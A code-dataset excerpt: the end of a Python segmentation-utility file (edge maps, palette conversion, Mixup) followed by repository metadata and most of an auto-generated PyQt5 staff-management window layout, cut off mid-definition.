edge = cv2.Canny(gray, 50, 150)
# cv2.imshow('edge', edge)
# cv2.waitKey(0)
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (edge_width, edge_width))
edge = cv2.dilate(edge, kernel)
edge = edge / 255
edge = torch.from_numpy(edge).unsqueeze(dim=0).float()
return edge
def __call__(self, sample):
# swap color axis because
# numpy image: H x W x C
# torch image: C X H X W
img = sample['image']
mask = sample['label']
mask = np.expand_dims(mask, axis=2)
img = np.array(img).astype(np.float32).transpose((2, 0, 1))
mask = np.array(mask).astype(np.int64).transpose((2, 0, 1))
img = torch.from_numpy(img).float().div(255)
img = self.normalize(img)
mask = torch.from_numpy(mask).float()
if self.add_edge:
edge = self.get_edge(sample['image'])
img = img + edge
return {'image': img, 'label': mask}
class RGBGrayExchange():
def __init__(self, path=None, palette=None):
self.palette = palette
"""RGB format"""
if palette is None:
self.palette = [[255, 255, 255], [0, 0, 255], [0, 255, 255],
[0, 255, 0], [255, 255, 0], [255, 0, 0]]
self.path = path
def read_img(self):
img = cv2.imread(self.path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3:
img = img[:, :, ::-1]
return img
def RGB_to_Gray(self, image=None):
if not self.path is None:
image = self.read_img()
Gray = np.zeros(shape=[image.shape[0], image.shape[1]], dtype=np.uint8)
for i in range(len(self.palette)):
index = image == np.array(self.palette[i])
index[..., 0][index[..., 1] == False] = False
index[..., 0][index[..., 2] == False] = False
Gray[index[..., 0]] = i
print('unique pixels:{}'.format(np.unique(Gray)))
return Gray
def Gray_to_RGB(self, image=None):
if not self.path is None:
image = self.read_img()
RGB = np.zeros(shape=[image.shape[0], image.shape[1], 3], dtype=np.uint8)
for i in range(len(self.palette)):
index = image == i
RGB[index] = np.array(self.palette[i])
print('unique pixels:{}'.format(np.unique(RGB)))
return RGB
class Mixup(nn.Module):
def __init__(self, alpha=1.0, use_edge=False):
super(Mixup, self).__init__()
self.alpha = alpha
self.use_edge = use_edge
def criterion(self, lam, outputs, targets_a, targets_b, criterion):
return lam * criterion(outputs, targets_a) + (1 - lam) * criterion(outputs, targets_b)
def forward(self, inputs, targets, criterion, model):
if self.alpha > 0:
lam = np.random.beta(self.alpha, self.alpha)
else:
lam = 1
batch_size = inputs.size(0)
index = torch.randperm(batch_size).cuda()
mix_inputs = lam*inputs + (1-lam)*inputs[index, :]
targets_a, targets_b = targets, targets[index]
outputs = model(mix_inputs)
losses = 0
if isinstance(outputs, (list, tuple)):
if self.use_edge:
for i in range(len(outputs) - 1):
loss = self.criterion(lam, outputs[i], targets_a, targets_b, criterion[0])
losses += loss
edge_targets_a = edge_contour(targets).long()
edge_targets_b = edge_targets_a[index]
loss2 = self.criterion(lam, outputs[-1], edge_targets_a, edge_targets_b, criterion[1])
losses += loss2
else:
for i in range(len(outputs)):
loss = self.criterion(lam, outputs[i], targets_a, targets_b, criterion)
losses += loss
else:
losses = self.criterion(lam, outputs, targets_a, targets_b, criterion)
return losses
def edge_contour(label, edge_width=3):
import cv2
cuda_type = label.is_cuda
label = label.cpu().numpy().astype(np.int)
b, h, w = label.shape
edge = np.zeros(label.shape)
# right
edge_right = edge[:, 1:h, :]
edge_right[(label[:, 1:h, :] != label[:, :h - 1, :]) & (label[:, 1:h, :] != 255)
& (label[:, :h - 1, :] != 255)] = 1
# up
edge_up = edge[:, :, :w - 1]
edge_up[(label[:, :, :w - 1] != label[:, :, 1:w])
& (label[:, :, :w - 1] != 255)
& (label[:, :, 1:w] != 255)] = 1
# upright
edge_upright = edge[:, :h - 1, :w - 1]
edge_upright[(label[:, :h - 1, :w - 1] != label[:, 1:h, 1:w])
& (label[:, :h - 1, :w - 1] != 255)
& (label[:, 1:h, 1:w] != 255)] = 1
# bottomright
edge_bottomright = edge[:, :h - 1, 1:w]
edge_bottomright[(label[:, :h - 1, 1:w] != label[:, 1:h, :w - 1])
& (label[:, :h - 1, 1:w] != 255)
& (label[:, 1:h, :w - 1] != 255)] = 1
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (edge_width, edge_width))
for i in range(edge.shape[0]):
edge[i] = cv2.dilate(edge[i], kernel)
# edge[edge == 1] = 255 # view edge
# import random
# cv2.imwrite(os.path.join('./edge', '{}.png'.format(random.random())), edge[0])
if cuda_type:
edge = torch.from_numpy(edge).cuda()
else:
edge = torch.from_numpy(edge)
return edge
if __name__ == '__main__':
path = './data/vaihingen/annotations/labels'
filelist = os.listdir(path)
for file in filelist:
print(file)
img = cv2.imread(os.path.join(path, file), cv2.IMREAD_UNCHANGED)
img = torch.from_numpy(img).unsqueeze(dim=0).repeat(2, 1, 1)
img = edge_contour(img)
# cv2.imwrite(os.path.join(save_path, os.path.splitext(file)[0] + '.png'), gray)
| 36.384615
| 106
| 0.540746
| 8,367
| 0.804055
| 0
| 0
| 0
| 0
| 0
| 0
| 1,016
| 0.097636
|
423075718e222b99f83bdb4ab73a14063da9d0ee
| 37,354
|
py
|
Python
|
ui/staff.py
|
AryaStarkSakura/Stylized-Neural-Painting
|
0502c9f12eb582fe2ebd0ffdc7008dc81cefa74c
|
[
"CC0-1.0"
] | null | null | null |
ui/staff.py
|
AryaStarkSakura/Stylized-Neural-Painting
|
0502c9f12eb582fe2ebd0ffdc7008dc81cefa74c
|
[
"CC0-1.0"
] | null | null | null |
ui/staff.py
|
AryaStarkSakura/Stylized-Neural-Painting
|
0502c9f12eb582fe2ebd0ffdc7008dc81cefa74c
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'staff.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
MainWindow.setStyleSheet("QListWidget, QListView, QTreeWidget, QTreeView,QFrame {\n"
" outline: 0px;\n"
"}\n"
"/*设置左侧选项的最小最大宽度,文字颜色和背景颜色*/\n"
"QListWidget {\n"
" min-width: 200px;\n"
" max-width: 200px;\n"
" color: white;\n"
" background-color:#2f4050\n"
"}\n"
"#head\n"
"{\n"
"background:white;\n"
"border-radius:30px;\n"
"}\n"
"#head_2\n"
"{\n"
"background:#CCFFCC;\n"
"border:1px solid;\n"
"border-color:#CCFFCC;\n"
"border-radius:60px;\n"
"}\n"
"#Search\n"
"{\n"
"border-radius:5px;\n"
"background:#293846;\n"
"border:0.5px solid;\n"
"border-color:white;\n"
"\n"
"}\n"
"QListWidget::item\n"
"{\n"
"height:60;\n"
"background-color:#293846;\n"
"}\n"
"#frame\n"
"{\n"
"background-color:#2f4050\n"
"\n"
"}\n"
"/*被选中时的背景颜色和左边框颜色*/\n"
"QListWidget::item:selected {\n"
" background: rgb(52, 52, 52);\n"
" border-left: 2px solid rgb(9, 187, 7);\n"
"}\n"
"/*鼠标悬停颜色*/\n"
"HistoryPanel::item:hover {\n"
" background: rgb(52, 52, 52);\n"
"}\n"
"/*右侧的层叠窗口的背景颜色*/\n"
"QStackedWidget {\n"
" background: white;\n"
"}\n"
"/*模拟的页面*/\n"
"#frame > QLabel\n"
"{\n"
"color:white;\n"
"}\n"
"#frame_2\n"
"{\n"
"background-color:#CCFFCC;\n"
"}\n"
"#page_2 > QLineEdit,QDateEdit\n"
"{\n"
"border-radius:5px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#6699CC;\n"
"}\n"
"#page_4 > QLineEdit\n"
"{\n"
"border-radius:5px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#6699CC;\n"
"}\n"
"QLineEdit\n"
"{\n"
"border-radius:5px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#6699CC;\n"
"}\n"
"\n"
"\n"
"")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.stackedWidget = QtWidgets.QStackedWidget(self.centralwidget)
self.stackedWidget.setGeometry(QtCore.QRect(190, 0, 611, 601))
self.stackedWidget.setStyleSheet("background-color:#FFFFFF\n"
"")
self.stackedWidget.setObjectName("stackedWidget")
self.page = QtWidgets.QWidget()
self.page.setObjectName("page")
self.split = QtWidgets.QFrame(self.page)
self.split.setGeometry(QtCore.QRect(10, 210, 600, 2))
self.split.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split.setFrameShape(QtWidgets.QFrame.HLine)
self.split.setFrameShadow(QtWidgets.QFrame.Raised)
self.split.setObjectName("split")
self.head_2 = QtWidgets.QToolButton(self.page)
self.head_2.setGeometry(QtCore.QRect(260, 30, 121, 121))
self.head_2.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("./pictures/staff3.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.head_2.setIcon(icon)
self.head_2.setIconSize(QtCore.QSize(100, 100))
self.head_2.setObjectName("head_2")
self.name = QtWidgets.QLabel(self.page)
self.name.setGeometry(QtCore.QRect(260, 160, 131, 31))
self.name.setAlignment(QtCore.Qt.AlignCenter)
self.name.setObjectName("name")
self.label = QtWidgets.QLabel(self.page)
self.label.setGeometry(QtCore.QRect(190, 240, 61, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_3 = QtWidgets.QLabel(self.page)
self.label_3.setGeometry(QtCore.QRect(190, 290, 51, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.page)
self.label_4.setGeometry(QtCore.QRect(190, 340, 71, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.page)
self.label_5.setGeometry(QtCore.QRect(190, 390, 61, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_5.setFont(font)
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.page)
self.label_6.setGeometry(QtCore.QRect(190, 440, 71, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.page)
self.label_7.setGeometry(QtCore.QRect(190, 490, 81, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.sname = QtWidgets.QLabel(self.page)
self.sname.setGeometry(QtCore.QRect(300, 250, 131, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sname.setFont(font)
self.sname.setObjectName("sname")
self.ssex = QtWidgets.QLabel(self.page)
self.ssex.setGeometry(QtCore.QRect(300, 300, 81, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.ssex.setFont(font)
self.ssex.setObjectName("ssex")
self.stime = QtWidgets.QLabel(self.page)
self.stime.setGeometry(QtCore.QRect(300, 350, 91, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.stime.setFont(font)
self.stime.setObjectName("stime")
self.srole = QtWidgets.QLabel(self.page)
self.srole.setGeometry(QtCore.QRect(300, 400, 81, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.srole.setFont(font)
self.srole.setObjectName("srole")
self.sphone = QtWidgets.QLabel(self.page)
self.sphone.setGeometry(QtCore.QRect(300, 450, 141, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sphone.setFont(font)
self.sphone.setObjectName("sphone")
self.sidcard = QtWidgets.QLabel(self.page)
self.sidcard.setGeometry(QtCore.QRect(300, 500, 181, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sidcard.setFont(font)
self.sidcard.setObjectName("sidcard")
self.label_8 = QtWidgets.QLabel(self.page)
self.label_8.setGeometry(QtCore.QRect(190, 540, 81, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_8.setFont(font)
self.label_8.setObjectName("label_8")
self.sidcard_2 = QtWidgets.QLabel(self.page)
self.sidcard_2.setGeometry(QtCore.QRect(300, 550, 181, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sidcard_2.setFont(font)
self.sidcard_2.setObjectName("sidcard_2")
self.stackedWidget.addWidget(self.page)
self.page_3 = QtWidgets.QWidget()
self.page_3.setObjectName("page_3")
self.searchTable = QtWidgets.QTableWidget(self.page_3)
self.searchTable.setGeometry(QtCore.QRect(0, 240, 611, 361))
self.searchTable.setStyleSheet("")
self.searchTable.setObjectName("searchTable")
self.searchTable.setColumnCount(9)
self.searchTable.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(6, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(7, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(8, item)
self.frame_2 = QtWidgets.QFrame(self.page_3)
self.frame_2.setGeometry(QtCore.QRect(10, 30, 611, 211))
self.frame_2.setStyleSheet("background-color:rgb(255, 249, 246)")
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.searchName = QtWidgets.QLineEdit(self.frame_2)
self.searchName.setGeometry(QtCore.QRect(170, 40, 181, 41))
self.searchName.setStyleSheet("border-radius:10px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#CCCCFF;\n"
"")
self.searchName.setObjectName("searchName")
self.searchNB = QtWidgets.QToolButton(self.frame_2)
self.searchNB.setGeometry(QtCore.QRect(370, 40, 101, 41))
self.searchNB.setStyleSheet("background-color:rgb(255, 249, 246);\n"
"border:0px;\n"
"\n"
"border-radius:5px")
self.searchNB.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("./pictures/search.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.searchNB.setIcon(icon1)
self.searchNB.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.searchNB.setObjectName("searchNB")
self.label_74 = QtWidgets.QLabel(self.frame_2)
self.label_74.setGeometry(QtCore.QRect(310, 149, 151, 40))
self.label_74.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_74.setObjectName("label_74")
self.modifyvalue = QtWidgets.QLineEdit(self.frame_2)
self.modifyvalue.setGeometry(QtCore.QRect(430, 160, 111, 21))
self.modifyvalue.setStyleSheet("border-radius:5px")
self.modifyvalue.setText("")
self.modifyvalue.setObjectName("modifyvalue")
self.commitTableModify = QtWidgets.QPushButton(self.frame_2)
self.commitTableModify.setGeometry(QtCore.QRect(170, 155, 121, 31))
self.commitTableModify.setStyleSheet("#commitTableModify{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitTableModify:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitTableModify.setObjectName("commitTableModify")
self.label_78 = QtWidgets.QLabel(self.frame_2)
self.label_78.setGeometry(QtCore.QRect(360, 10, 231, 21))
font = QtGui.QFont()
font.setPointSize(8)
self.label_78.setFont(font)
self.label_78.setObjectName("label_78")
self.commitTableDel = QtWidgets.QPushButton(self.frame_2)
self.commitTableDel.setGeometry(QtCore.QRect(170, 110, 121, 31))
self.commitTableDel.setStyleSheet("#commitTableDel{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitTableDel:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitTableDel.setObjectName("commitTableDel")
self.split_3 = QtWidgets.QFrame(self.page_3)
self.split_3.setGeometry(QtCore.QRect(10, 30, 600, 2))
self.split_3.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split_3.setFrameShape(QtWidgets.QFrame.HLine)
self.split_3.setFrameShadow(QtWidgets.QFrame.Raised)
self.split_3.setObjectName("split_3")
self.toolButton_2 = QtWidgets.QToolButton(self.page_3)
self.toolButton_2.setGeometry(QtCore.QRect(20, 0, 101, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.toolButton_2.setFont(font)
self.toolButton_2.setStyleSheet("border:none")
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap("./pictures/search1.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_2.setIcon(icon2)
self.toolButton_2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolButton_2.setObjectName("toolButton_2")
self.line = QtWidgets.QFrame(self.page_3)
self.line.setGeometry(QtCore.QRect(10, 230, 601, 16))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.stackedWidget.addWidget(self.page_3)
self.page_2 = QtWidgets.QWidget()
self.page_2.setObjectName("page_2")
self.label_9 = QtWidgets.QLabel(self.page_2)
self.label_9.setGeometry(QtCore.QRect(100, 60, 101, 40))
self.label_9.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_9.setObjectName("label_9")
self.split_2 = QtWidgets.QFrame(self.page_2)
self.split_2.setGeometry(QtCore.QRect(10, 30, 600, 2))
self.split_2.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split_2.setFrameShape(QtWidgets.QFrame.HLine)
self.split_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.split_2.setObjectName("split_2")
self.label_10 = QtWidgets.QLabel(self.page_2)
self.label_10.setGeometry(QtCore.QRect(100, 260, 101, 41))
self.label_10.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_10.setObjectName("label_10")
self.label_11 = QtWidgets.QLabel(self.page_2)
self.label_11.setGeometry(QtCore.QRect(100, 110, 101, 41))
self.label_11.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.page_2)
self.label_12.setGeometry(QtCore.QRect(100, 310, 101, 41))
self.label_12.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_12.setObjectName("label_12")
self.label_13 = QtWidgets.QLabel(self.page_2)
self.label_13.setGeometry(QtCore.QRect(100, 160, 101, 41))
self.label_13.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_13.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.page_2)
self.label_14.setGeometry(QtCore.QRect(100, 360, 101, 41))
self.label_14.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_14.setObjectName("label_14")
self.label_15 = QtWidgets.QLabel(self.page_2)
self.label_15.setGeometry(QtCore.QRect(100, 210, 101, 41))
self.label_15.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_15.setObjectName("label_15")
self.label_16 = QtWidgets.QLabel(self.page_2)
self.label_16.setGeometry(QtCore.QRect(100, 410, 101, 41))
self.label_16.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_16.setObjectName("label_16")
self.label_17 = QtWidgets.QLabel(self.page_2)
self.label_17.setGeometry(QtCore.QRect(100, 460, 101, 41))
self.label_17.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_17.setObjectName("label_17")
self.inputsid = QtWidgets.QLineEdit(self.page_2)
self.inputsid.setGeometry(QtCore.QRect(220, 70, 221, 21))
self.inputsid.setObjectName("inputsid")
self.inputname = QtWidgets.QLineEdit(self.page_2)
self.inputname.setGeometry(QtCore.QRect(220, 120, 221, 21))
self.inputname.setObjectName("inputname")
self.inputuser = QtWidgets.QLineEdit(self.page_2)
self.inputuser.setGeometry(QtCore.QRect(220, 270, 221, 21))
self.inputuser.setObjectName("inputuser")
self.inputpwd = QtWidgets.QLineEdit(self.page_2)
self.inputpwd.setGeometry(QtCore.QRect(220, 320, 221, 21))
self.inputpwd.setObjectName("inputpwd")
self.inputrole = QtWidgets.QLineEdit(self.page_2)
self.inputrole.setGeometry(QtCore.QRect(220, 370, 221, 21))
self.inputrole.setObjectName("inputrole")
self.inputidcard = QtWidgets.QLineEdit(self.page_2)
self.inputidcard.setGeometry(QtCore.QRect(220, 420, 221, 21))
self.inputidcard.setObjectName("inputidcard")
self.inputphone = QtWidgets.QLineEdit(self.page_2)
self.inputphone.setGeometry(QtCore.QRect(220, 470, 221, 21))
self.inputphone.setObjectName("inputphone")
self.toolButton_3 = QtWidgets.QToolButton(self.page_2)
self.toolButton_3.setGeometry(QtCore.QRect(20, 0, 111, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.toolButton_3.setFont(font)
self.toolButton_3.setStyleSheet("border:none\n"
"")
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap("./pictures/insert.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_3.setIcon(icon3)
self.toolButton_3.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolButton_3.setObjectName("toolButton_3")
self.commitAdd = QtWidgets.QPushButton(self.page_2)
self.commitAdd.setGeometry(QtCore.QRect(200, 530, 211, 31))
self.commitAdd.setStyleSheet("#commitAdd{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitAdd:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitAdd.setObjectName("commitAdd")
self.inputdate = QtWidgets.QDateEdit(self.page_2)
self.inputdate.setGeometry(QtCore.QRect(220, 220, 221, 22))
self.inputdate.setDateTime(QtCore.QDateTime(QtCore.QDate(2020, 1, 1), QtCore.QTime(0, 0, 0)))
self.inputdate.setObjectName("inputdate")
self.inputfemale = QtWidgets.QRadioButton(self.page_2)
self.inputfemale.setGeometry(QtCore.QRect(320, 170, 115, 19))
self.inputfemale.setObjectName("inputfemale")
self.inputmale = QtWidgets.QRadioButton(self.page_2)
self.inputmale.setGeometry(QtCore.QRect(220, 170, 81, 19))
self.inputmale.setObjectName("inputmale")
self.stackedWidget.addWidget(self.page_2)
self.page_4 = QtWidgets.QWidget()
self.page_4.setObjectName("page_4")
self.split_4 = QtWidgets.QFrame(self.page_4)
self.split_4.setGeometry(QtCore.QRect(10, 30, 600, 2))
self.split_4.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split_4.setFrameShape(QtWidgets.QFrame.HLine)
self.split_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.split_4.setObjectName("split_4")
self.toolButton_4 = QtWidgets.QToolButton(self.page_4)
self.toolButton_4.setGeometry(QtCore.QRect(20, 0, 111, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.toolButton_4.setFont(font)
self.toolButton_4.setStyleSheet("border:none\n"
"")
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap("./pictures/delete.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_4.setIcon(icon4)
self.toolButton_4.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolButton_4.setObjectName("toolButton_4")
self.deleteTable = QtWidgets.QTableWidget(self.page_4)
self.deleteTable.setGeometry(QtCore.QRect(10, 260, 601, 341))
self.deleteTable.setStyleSheet("")
self.deleteTable.setObjectName("deleteTable")
self.deleteTable.setColumnCount(9)
self.deleteTable.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(6, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(7, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(8, item)
self.desid = QtWidgets.QLineEdit(self.page_4)
self.desid.setGeometry(QtCore.QRect(250, 90, 221, 21))
self.desid.setObjectName("desid")
self.label_18 = QtWidgets.QLabel(self.page_4)
self.label_18.setGeometry(QtCore.QRect(150, 80, 91, 40))
self.label_18.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_18.setObjectName("label_18")
self.dename = QtWidgets.QLineEdit(self.page_4)
self.dename.setGeometry(QtCore.QRect(250, 130, 221, 21))
self.dename.setObjectName("dename")
self.label_19 = QtWidgets.QLabel(self.page_4)
self.label_19.setGeometry(QtCore.QRect(150, 120, 91, 41))
self.label_19.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_19.setObjectName("label_19")
self.deidcard = QtWidgets.QLineEdit(self.page_4)
self.deidcard.setGeometry(QtCore.QRect(250, 170, 221, 21))
self.deidcard.setObjectName("deidcard")
self.label_20 = QtWidgets.QLabel(self.page_4)
self.label_20.setGeometry(QtCore.QRect(150, 160, 81, 41))
self.label_20.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_20.setObjectName("label_20")
self.commitDe = QtWidgets.QPushButton(self.page_4)
self.commitDe.setGeometry(QtCore.QRect(240, 210, 93, 28))
self.commitDe.setStyleSheet("#commitDe{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitDe:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitDe.setObjectName("commitDe")
self.label_21 = QtWidgets.QLabel(self.page_4)
self.label_21.setGeometry(QtCore.QRect(210, 35, 211, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.label_21.setFont(font)
self.label_21.setObjectName("label_21")
self.stackedWidget.addWidget(self.page_4)
self.listWidget = QtWidgets.QListWidget(self.centralwidget)
self.listWidget.setGeometry(QtCore.QRect(0, 200, 204, 400))
self.listWidget.setObjectName("listWidget")
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap("./pictures/staff5.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
item.setIcon(icon5)
self.listWidget.addItem(item)
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap("./pictures/staff2.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
item.setIcon(icon6)
self.listWidget.addItem(item)
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap("./pictures/staff4.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
item.setIcon(icon7)
self.listWidget.addItem(item)
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
item.setIcon(icon5)
self.listWidget.addItem(item)
self.frame = QtWidgets.QFrame(self.centralwidget)
self.frame.setGeometry(QtCore.QRect(0, 0, 204, 211))
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.head = QtWidgets.QToolButton(self.frame)
self.head.setGeometry(QtCore.QRect(60, 20, 60, 60))
self.head.setText("")
self.head.setIcon(icon)
self.head.setIconSize(QtCore.QSize(60, 60))
self.head.setObjectName("head")
self.welcome = QtWidgets.QLabel(self.frame)
self.welcome.setGeometry(QtCore.QRect(30, 90, 110, 20))
self.welcome.setText("")
self.welcome.setAlignment(QtCore.Qt.AlignCenter)
self.welcome.setObjectName("welcome")
self.label_2 = QtWidgets.QLabel(self.frame)
self.label_2.setGeometry(QtCore.QRect(40, 140, 121, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.Search = QtWidgets.QLineEdit(self.frame)
self.Search.setGeometry(QtCore.QRect(20, 170, 145, 25))
font = QtGui.QFont()
font.setFamily("微软雅黑")
font.setPointSize(7)
self.Search.setFont(font)
self.Search.setStyleSheet("")
self.Search.setObjectName("Search")
self.toolButton = QtWidgets.QToolButton(self.frame)
self.toolButton.setGeometry(QtCore.QRect(170, 170, 21, 20))
self.toolButton.setStyleSheet("background-color:#2f4050;\n"
"border:0px;\n"
"\n"
"border-radius:5px")
